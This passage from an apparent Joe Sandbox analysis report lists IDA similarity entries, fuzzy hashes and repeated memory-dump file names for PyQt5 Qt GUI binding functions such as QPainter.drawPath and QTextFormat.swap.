                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?elementBool_Count@FromLongPainterPath@@
                                                                                                                                                                                                                • String ID: QTextFormat$isEmpty$isEmpty(self) -> bool
                                                                                                                                                                                                                • API String ID: 3302664181-1918454510
                                                                                                                                                                                                                • Opcode ID: a20901cf66dcde50ad7311a5c395280e8f3a9a5b817bce25026a6a24b8dbeafc
                                                                                                                                                                                                                • Instruction ID: 4f21527d9b14fdbca6d2cb712b27e7cb38db62a2af36b5a60fda729045fdd143
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a20901cf66dcde50ad7311a5c395280e8f3a9a5b817bce25026a6a24b8dbeafc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08015AB6B09B4681EB108F75E8884A933ACFF84B94B9140B6CE5D43360DF7CE599C380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?drawPainterPainter@@Path@Path@@@
                                                                                                                                                                                                                • String ID: BJ9$QPainter$drawPath$drawPath(self, path: QPainterPath)
                                                                                                                                                                                                                • API String ID: 397086431-3604277530
                                                                                                                                                                                                                • Opcode ID: c6acc149c480db940c89464465441bdec1ea30872392117e81307073b056f59b
                                                                                                                                                                                                                • Instruction ID: 5aa013d5986b3d6e9a31d1ac968323377bcce4be7c98d797011807e20cb75e7d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c6acc149c480db940c89464465441bdec1ea30872392117e81307073b056f59b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF11ECB5A18F46C1EB50DF25E8886A933B9FB48B94FA140B6CA5D03320DF7DD559C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?setTextOption@QStaticText@@QEAAXAEBVQTextOption@@@Z.QT5GUI ref: 00007FFB9A33DCE3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Text$?setOption@Option@@@StaticText@@
                                                                                                                                                                                                                • String ID: BJ9$QStaticText$setTextOption$setTextOption(self, textOption: QTextOption)
                                                                                                                                                                                                                • API String ID: 1549580214-3228975014
                                                                                                                                                                                                                • Opcode ID: 3182e812db8d97e37d31260606e33a90866172172359f6c3c5c710757014f941
                                                                                                                                                                                                                • Instruction ID: 20fdaac39a0ea3ac0c5e59a7843057aac24e3e0c26ba5e901441cb7f5003b8fb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3182e812db8d97e37d31260606e33a90866172172359f6c3c5c710757014f941
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 831106B5A18F4AC1EB10DF25E8892A933A8FB49B84FA140B6CA5C03320DF3DD549C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?type@Bool_Format@@FromLongText
                                                                                                                                                                                                                • String ID: QTextFormat$isBlockFormat$isBlockFormat(self) -> bool
                                                                                                                                                                                                                • API String ID: 1807932774-2730531752
                                                                                                                                                                                                                • Opcode ID: 029e39fe9a6f628f44f8ff7c067c5e6c971b584ffef2ac4b987f83ed0189ee65
                                                                                                                                                                                                                • Instruction ID: ee7e074f6c645979258bb279e03d5d511269ec802955011af8a7a3a30bca5ff9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 029e39fe9a6f628f44f8ff7c067c5e6c971b584ffef2ac4b987f83ed0189ee65
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 990148B6B08A4681EB109F71E8884A873A8FB54795B9540B6CE5D43360DF7DDA99C380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Text$?setFormat@Format@@@Object@@
                                                                                                                                                                                                                • String ID: BJ9$QTextObject$setFormat$setFormat(self, format: QTextFormat)
                                                                                                                                                                                                                • API String ID: 760775155-52768488
                                                                                                                                                                                                                • Opcode ID: 7443c91ac825b71c42e99f05e2dd46f32069fdb6c8a025c23fb5e6b3568a6c3e
                                                                                                                                                                                                                • Instruction ID: 9d97837edff5938e86527712aabdbfe3e28bf592070c08ca61244f435df625d6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7443c91ac825b71c42e99f05e2dd46f32069fdb6c8a025c23fb5e6b3568a6c3e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A1118B5A18F46C1EB10DF25E8882A933B9FB48B84F9140B2CA4D03320DF3DD95AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?swap@Region@@V1@@
                                                                                                                                                                                                                • String ID: BJ9$QPainterPath$swap$swap(self, other: QPainterPath)
                                                                                                                                                                                                                • API String ID: 2712419754-3530485660
                                                                                                                                                                                                                • Opcode ID: badba2366f75d6bc59dc7301b271fe8f695c2d23d2aa92159adf6a02234b4bdb
                                                                                                                                                                                                                • Instruction ID: 318a92e8ad734b8e8a01f3382b566c17e2f537a789c89bbfdb4b9dac62f7274b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: badba2366f75d6bc59dc7301b271fe8f695c2d23d2aa92159adf6a02234b4bdb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D51130B5A18F46C1EB10DF24E8886A933B8FB58B84F914076CA5D03320CF3DD559C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?swap@Format@@TextV1@@
                                                                                                                                                                                                                • String ID: BJ9$QTextFormat$swap$swap(self, other: QTextFormat)
                                                                                                                                                                                                                • API String ID: 986106111-4037277294
                                                                                                                                                                                                                • Opcode ID: 309df2eaffc27fcca22f97f0b50616adb5cd90d82e0c719c8d2f38cbba496cf6
                                                                                                                                                                                                                • Instruction ID: d9900f9304c6dac8e9f009b53c7a51cb4ea75f563dcfaf4c95d7516489f867f7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 309df2eaffc27fcca22f97f0b50616adb5cd90d82e0c719c8d2f38cbba496cf6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E1118B5A18E46C1EB10DF25E8882A933A8FB48B84F9140B2CA5D03320DF3DD55AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?swap@Format@@TextV1@@
                                                                                                                                                                                                                • String ID: BJ9$QPalette$swap$swap(self, other: QPalette)
                                                                                                                                                                                                                • API String ID: 986106111-1983445832
                                                                                                                                                                                                                • Opcode ID: 0aadf9379e76228c1e05613afac1d4e8ebb7325c66e00ae7799a6518653daf71
                                                                                                                                                                                                                • Instruction ID: f4aec1dbada79d148b9983a7d0f514b9aa776b7a55b51bae414e21b597b62fab
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0aadf9379e76228c1e05613afac1d4e8ebb7325c66e00ae7799a6518653daf71
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D011FAB5A18F46C1EB10DF25E8886A933B8FB89B84FA140B6CA5D03320DF7DD55AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
